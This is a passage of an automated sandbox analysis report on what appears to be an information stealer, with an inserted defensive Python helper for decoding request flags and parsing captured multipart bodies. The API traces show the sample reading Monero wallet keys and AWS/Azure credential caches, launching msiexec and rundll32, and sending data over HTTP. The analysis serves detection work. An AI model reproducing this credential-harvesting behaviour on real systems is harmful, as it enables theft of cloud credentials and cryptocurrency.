                          • Part of subcall function 005FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 005FAA12
                          • Part of subcall function 005FA8A0: lstrcpy.KERNEL32(?,00600E17), ref: 005FA905
                          • Part of subcall function 005FA920: lstrcpy.KERNEL32(00000000,?), ref: 005FA972
                          • Part of subcall function 005FA920: lstrcat.KERNEL32(00000000), ref: 005FA982
                        • InternetCloseHandle.WININET(00000000), ref: 005E4ECF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                        • String ID: "$"$------$------$------
                        • API String ID: 460715078-2180234286
                        • Opcode ID: f379f977c26347c242beb979b3325d4cf9f9393bd45cb48e55073b5c24978bf2
                        • Instruction ID: eb9cc44b0eff0f8d45add00f2efa5cb4394cc21fa93b00db617a954b01e3547b
                        • Opcode Fuzzy Hash: f379f977c26347c242beb979b3325d4cf9f9393bd45cb48e55073b5c24978bf2
                        • Instruction Fuzzy Hash: C4120EB291011DAADB18EB50CD56FEEBB79BF54340F5041A9B20A63091EF742F49CF62
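Both WinINet functions traced above (entry points 005E59F8 and 005E4915) follow the same pattern: InternetOpenA, InternetConnectA with service type 3 (INTERNET_SERVICE_HTTP), HttpOpenRequestA with dwFlags 0x00400100, HttpSendRequestA, then InternetReadFile into a 0xC7- or 0x7CF-byte buffer. The string IDs shared by both ("\"" and a repeated "------") are consistent with a multipart/form-data request body. The Python below is an added example, not the sample's code: it decodes the dwFlags value, then builds and splits a multipart body so a responder working from a packet capture can pull the parts apart. The boundary, field names and payload in it are constructed; the sample's real boundary and field names are not recoverable from the listing.

```python
"""Decode the traced HttpOpenRequestA flags and build/parse a multipart body.

Added example (not the sample's code). BOUNDARY and the field names below are
assumptions; the flag constants are the documented WinINet values.
"""
import re

# Assumed boundary; the one this sample uses is not visible in the trace.
BOUNDARY = "------ExampleBoundary7MA4YWxk"

# Documented WinINet dwFlags bits (wininet.h).
INTERNET_FLAG_KEEP_CONNECTION = 0x00400000
INTERNET_FLAG_PRAGMA_NOCACHE = 0x00000100
_FLAG_NAMES = {
    INTERNET_FLAG_PRAGMA_NOCACHE: "INTERNET_FLAG_PRAGMA_NOCACHE",
    0x00000200: "INTERNET_FLAG_NO_UI",
    0x00080000: "INTERNET_FLAG_NO_COOKIES",
    INTERNET_FLAG_KEEP_CONNECTION: "INTERNET_FLAG_KEEP_CONNECTION",
    0x00800000: "INTERNET_FLAG_SECURE",
    0x04000000: "INTERNET_FLAG_NO_CACHE_WRITE",
}


def decode_wininet_flags(value):
    """Name the known bits set in an HttpOpenRequestA dwFlags value, lowest bit first."""
    return [name for bit, name in sorted(_FLAG_NAMES.items()) if value & bit]


def build_multipart(fields, boundary=BOUNDARY):
    """Serialize text/bytes fields as multipart/form-data (RFC 7578 framing, CRLF lines)."""
    out = bytearray()
    for name, value in fields.items():
        out += f"--{boundary}\r\n".encode()
        out += f'Content-Disposition: form-data; name="{name}"\r\n\r\n'.encode()
        out += value.encode() if isinstance(value, str) else value
        out += b"\r\n"
    out += f"--{boundary}--\r\n".encode()
    return bytes(out)


_DISP_RE = re.compile(rb'name="([^"]*)"')


def parse_multipart(body, boundary):
    """Split a multipart body into {name: value} using only the boundary string.

    Good enough for triage of a captured body; a value containing the boundary
    itself would confuse this splitter, as it would any boundary-based parser.
    """
    delim = f"--{boundary}".encode()
    result = {}
    for part in body.split(delim)[1:]:  # [0] is the preamble before the first delimiter
        if part.startswith(b"--"):
            break  # closing delimiter "--boundary--"
        header, sep, value = part.lstrip(b"\r\n").partition(b"\r\n\r\n")
        if not sep:
            continue
        if value.endswith(b"\r\n"):  # strip exactly the CRLF that precedes the next delimiter
            value = value[:-2]
        m = _DISP_RE.search(header)
        if m:
            result[m.group(1).decode()] = value
    return result


if __name__ == "__main__":
    print(decode_wininet_flags(0x00400100))
    # Constructed stand-in for harvested data; not taken from the sample.
    body = build_multipart({"hwid": "EXAMPLE-HWID", "file": "browser: FileZilla\nprofile: null\n"})
    print(body.decode())
    print(parse_multipart(body, BOUNDARY))
```

0x00400100 decodes to INTERNET_FLAG_KEEP_CONNECTION | INTERNET_FLAG_PRAGMA_NOCACHE, which is plain HTTP (no INTERNET_FLAG_SECURE), so the request bodies are visible on the wire and a proxy or IDS can key on the boundary once it has been observed in one capture.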
                        APIs
                          • Part of subcall function 005FA740: lstrcpy.KERNEL32(00600E17,00000000), ref: 005FA788
                          • Part of subcall function 005FA920: lstrcpy.KERNEL32(00000000,?), ref: 005FA972
                          • Part of subcall function 005FA920: lstrcat.KERNEL32(00000000), ref: 005FA982
                          • Part of subcall function 005FA8A0: lstrcpy.KERNEL32(?,00600E17), ref: 005FA905
                          • Part of subcall function 005FA9B0: lstrlen.KERNEL32(?,011591F8,?,\Monero\wallet.keys,00600E17), ref: 005FA9C5
                          • Part of subcall function 005FA9B0: lstrcpy.KERNEL32(00000000), ref: 005FAA04
                          • Part of subcall function 005FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 005FAA12
                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0115D458,00000000,?,0060144C,00000000,?,?), ref: 005ECA6C
                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 005ECA89
                        • GetFileSize.KERNEL32(00000000,00000000), ref: 005ECA95
                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 005ECAA8
                        • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 005ECAD9
                        • StrStrA.SHLWAPI(?,0115D578,00600B52), ref: 005ECAF7
                        • StrStrA.SHLWAPI(00000000,0115D518), ref: 005ECB1E
                        • StrStrA.SHLWAPI(?,0115D920,00000000,?,00601458,00000000,?,00000000,00000000,?,01158F88,00000000,?,00601454,00000000,?), ref: 005ECCA2
                        • StrStrA.SHLWAPI(00000000,0115D780), ref: 005ECCB9
                          • Part of subcall function 005EC820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 005EC871
                          • Part of subcall function 005EC820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 005EC87C
                        • StrStrA.SHLWAPI(?,0115D780,00000000,?,0060145C,00000000,?,00000000,01158FA8), ref: 005ECD5A
                        • StrStrA.SHLWAPI(00000000,01159218), ref: 005ECD71
                          • Part of subcall function 005EC820: lstrcat.KERNEL32(?,00600B46), ref: 005EC943
                          • Part of subcall function 005EC820: lstrcat.KERNEL32(?,00600B47), ref: 005EC957
                          • Part of subcall function 005EC820: lstrcat.KERNEL32(?,00600B4E), ref: 005EC978
                        • lstrlen.KERNEL32(00000000), ref: 005ECE44
                        • CloseHandle.KERNEL32(00000000), ref: 005ECE9C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                        • String ID:
                        • API String ID: 3744635739-3916222277
                        • Opcode ID: 2dd9791825e297c57cf215c3e298864dd624330c96a9915c530b51110523dc13
                        • Instruction ID: d856974c900cfec526e071a2fd03d8640879c0fa33bc59599f896c15d59340a3
                        • Opcode Fuzzy Hash: 2dd9791825e297c57cf215c3e298864dd624330c96a9915c530b51110523dc13
                        • Instruction Fuzzy Hash: 12E114B190010DABDB18EBA0DC95FFE7B78BF54340F008169F20A67195DF746A4ACB66
                        APIs
                          • Part of subcall function 005FA740: lstrcpy.KERNEL32(00600E17,00000000), ref: 005FA788
                        • RegOpenKeyExA.ADVAPI32(00000000,0115B308,00000000,00020019,00000000,006005B6), ref: 005F83A4
                        • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 005F8426
                        • wsprintfA.USER32 ref: 005F8459
                        • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 005F847B
                        • RegCloseKey.ADVAPI32(00000000), ref: 005F848C
                        • RegCloseKey.ADVAPI32(00000000), ref: 005F8499
                          • Part of subcall function 005FA7A0: lstrcpy.KERNEL32(?,00000000), ref: 005FA7E6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseOpenlstrcpy$Enumwsprintf
                        • String ID: - $%s\%s$?
                        • API String ID: 3246050789-3278919252
                        • Opcode ID: cf906e63bd94cc0afca00f28277960b54efed722cbf38a7c7bf0c15134771ff5
                        • Instruction ID: 5dc0686b5eb1a2313a51c5a67f0e411fa1669b0c0862bbdb41304d98c4ac14ac
                        • Opcode Fuzzy Hash: cf906e63bd94cc0afca00f28277960b54efed722cbf38a7c7bf0c15134771ff5
                        • Instruction Fuzzy Hash: 6B811CB191011DABDB28DB50CD95FFA7BB8FF48700F008699E209A6190DF756B86CF91
                        APIs
                          • Part of subcall function 005F8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 005F8E0B
                        • lstrcat.KERNEL32(?,00000000), ref: 005F4DB0
                        • lstrcat.KERNEL32(?,\.azure\), ref: 005F4DCD
                          • Part of subcall function 005F4910: wsprintfA.USER32 ref: 005F492C
                          • Part of subcall function 005F4910: FindFirstFileA.KERNEL32(?,?), ref: 005F4943
                        • lstrcat.KERNEL32(?,00000000), ref: 005F4E3C
                        • lstrcat.KERNEL32(?,\.aws\), ref: 005F4E59
                          • Part of subcall function 005F4910: StrCmpCA.SHLWAPI(?,00600FDC), ref: 005F4971
                          • Part of subcall function 005F4910: StrCmpCA.SHLWAPI(?,00600FE0), ref: 005F4987
                          • Part of subcall function 005F4910: FindNextFileA.KERNEL32(000000FF,?), ref: 005F4B7D
                          • Part of subcall function 005F4910: FindClose.KERNEL32(000000FF), ref: 005F4B92
                        • lstrcat.KERNEL32(?,00000000), ref: 005F4EC8
                        • lstrcat.KERNEL32(?,\.IdentityService\), ref: 005F4EE5
                          • Part of subcall function 005F4910: wsprintfA.USER32 ref: 005F49B0
                          • Part of subcall function 005F4910: StrCmpCA.SHLWAPI(?,006008D2), ref: 005F49C5
                          • Part of subcall function 005F4910: wsprintfA.USER32 ref: 005F49E2
                          • Part of subcall function 005F4910: PathMatchSpecA.SHLWAPI(?,?), ref: 005F4A1E
                          • Part of subcall function 005F4910: lstrcat.KERNEL32(?,0115E838), ref: 005F4A4A
                          • Part of subcall function 005F4910: lstrcat.KERNEL32(?,00600FF8), ref: 005F4A5C
                          • Part of subcall function 005F4910: lstrcat.KERNEL32(?,?), ref: 005F4A70
                          • Part of subcall function 005F4910: lstrcat.KERNEL32(?,00600FFC), ref: 005F4A82
                          • Part of subcall function 005F4910: lstrcat.KERNEL32(?,?), ref: 005F4A96
                          • Part of subcall function 005F4910: CopyFileA.KERNEL32(?,?,00000001), ref: 005F4AAC
                          • Part of subcall function 005F4910: DeleteFileA.KERNEL32(?), ref: 005F4B31
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                         • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                        • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                        • API String ID: 949356159-974132213
                        • Opcode ID: 7f33dce7bbc755beaec6d9a9238ceea26f4f550e659cfe03d35b4785c65626b3
                        • Instruction ID: 98e55332f6b9922c5e698243c2e5c045676f1dc90110eae10d06bbc722bf13fa
                        • Opcode Fuzzy Hash: 7f33dce7bbc755beaec6d9a9238ceea26f4f550e659cfe03d35b4785c65626b3
                        • Instruction Fuzzy Hash: 2C4176B9A4020867DB18F760DC4BFEE7739BB65704F004454B68A560C1EEB45BC98B93
                        APIs
                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 005F906C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                         • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateGlobalStream
                        • String ID: image/jpeg
                        • API String ID: 2244384528-3785015651
                        • Opcode ID: 3fed43ddb3e460c2faaa9e97400c63e68011f260495b43ec936148eac92b591d
                        • Instruction ID: c07430c9261cc9b0ee54fa8931a8a47b2a663f37802cd39fa1d08982690ef35f
                        • Opcode Fuzzy Hash: 3fed43ddb3e460c2faaa9e97400c63e68011f260495b43ec936148eac92b591d
                        • Instruction Fuzzy Hash: 7571F075910209AFDB18DFE4DC89FEEBBB9BF48700F108518F655A7290DB34A905CB61
                        APIs
                          • Part of subcall function 005FA740: lstrcpy.KERNEL32(00600E17,00000000), ref: 005FA788
                        • ShellExecuteEx.SHELL32(0000003C), ref: 005F31C5
                        • ShellExecuteEx.SHELL32(0000003C), ref: 005F335D
                        • ShellExecuteEx.SHELL32(0000003C), ref: 005F34EA
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                         • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExecuteShell$lstrcpy
                        • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                        • API String ID: 2507796910-3625054190
                        • Opcode ID: 8c10c894325d05864851c90d25347160e79a24660169f4d00449646d23f4854b
                        • Instruction ID: 9dbc6d22e37d93d5588ae2c788cc2cdb729196b8569031053a9826d86bc7970b
                        • Opcode Fuzzy Hash: 8c10c894325d05864851c90d25347160e79a24660169f4d00449646d23f4854b
                        • Instruction Fuzzy Hash: D31212B180010E9ADB19EB90CD56FFE7B78BF94340F504159E60A66095EF782B4ACF53
                        APIs
                          • Part of subcall function 005FA7A0: lstrcpy.KERNEL32(?,00000000), ref: 005FA7E6
                          • Part of subcall function 005E6280: InternetOpenA.WININET(00600DFE,00000001,00000000,00000000,00000000), ref: 005E62E1
                          • Part of subcall function 005E6280: StrCmpCA.SHLWAPI(?,0115E7B8), ref: 005E6303
                          • Part of subcall function 005E6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 005E6335
                          • Part of subcall function 005E6280: HttpOpenRequestA.WININET(00000000,GET,?,0115E3F8,00000000,00000000,00400100,00000000), ref: 005E6385
                          • Part of subcall function 005E6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 005E63BF
                          • Part of subcall function 005E6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 005E63D1
                          • Part of subcall function 005FA8A0: lstrcpy.KERNEL32(?,00600E17), ref: 005FA905
                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 005F5318
                        • lstrlen.KERNEL32(00000000), ref: 005F532F
                          • Part of subcall function 005F8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 005F8E52
                        • StrStrA.SHLWAPI(00000000,00000000), ref: 005F5364
                        • lstrlen.KERNEL32(00000000), ref: 005F5383
                        • lstrlen.KERNEL32(00000000), ref: 005F53AE
                          • Part of subcall function 005FA740: lstrcpy.KERNEL32(00600E17,00000000), ref: 005FA788
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                         • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                        • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                        • API String ID: 3240024479-1526165396
                        • Opcode ID: eb01ecdbfe47fac84ca978180d2437e3f4bbf999b21aedbd8377e80794cf64a5
                        • Instruction ID: 95cbbc0091ebddb94ddf92c4e2ab6a0a955ff1eeb31d325124cf695b4d944588
                        • Opcode Fuzzy Hash: eb01ecdbfe47fac84ca978180d2437e3f4bbf999b21aedbd8377e80794cf64a5
                        • Instruction Fuzzy Hash: A9512EB091014E9BCB18FF60C99AAFD7B79BF90340F508014E64A5B591EF786B46CB53
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                         • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpylstrlen
                        • String ID:
                        • API String ID: 2001356338-0
                        • Opcode ID: 52e4aa62923cac71e2272e2178cb820a8374504067aab57745f52bdc4d2b1284
                        • Instruction ID: 1ab3ba209fd386d0d063b2eca026ff3ed7b61ca2c4a6af7656f67937f8623b1b
                        • Opcode Fuzzy Hash: 52e4aa62923cac71e2272e2178cb820a8374504067aab57745f52bdc4d2b1284
                        • Instruction Fuzzy Hash: 0DC164B590011D9BCB18EF60DC8DFFA7B79BF94304F104598E60AA7241EA74AA85CF91
                        APIs
                          • Part of subcall function 005F8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 005F8E0B
                        • lstrcat.KERNEL32(?,00000000), ref: 005F42EC
                        • lstrcat.KERNEL32(?,0115DF90), ref: 005F430B
                        • lstrcat.KERNEL32(?,?), ref: 005F431F
                        • lstrcat.KERNEL32(?,0115D560), ref: 005F4333
                          • Part of subcall function 005FA740: lstrcpy.KERNEL32(00600E17,00000000), ref: 005FA788
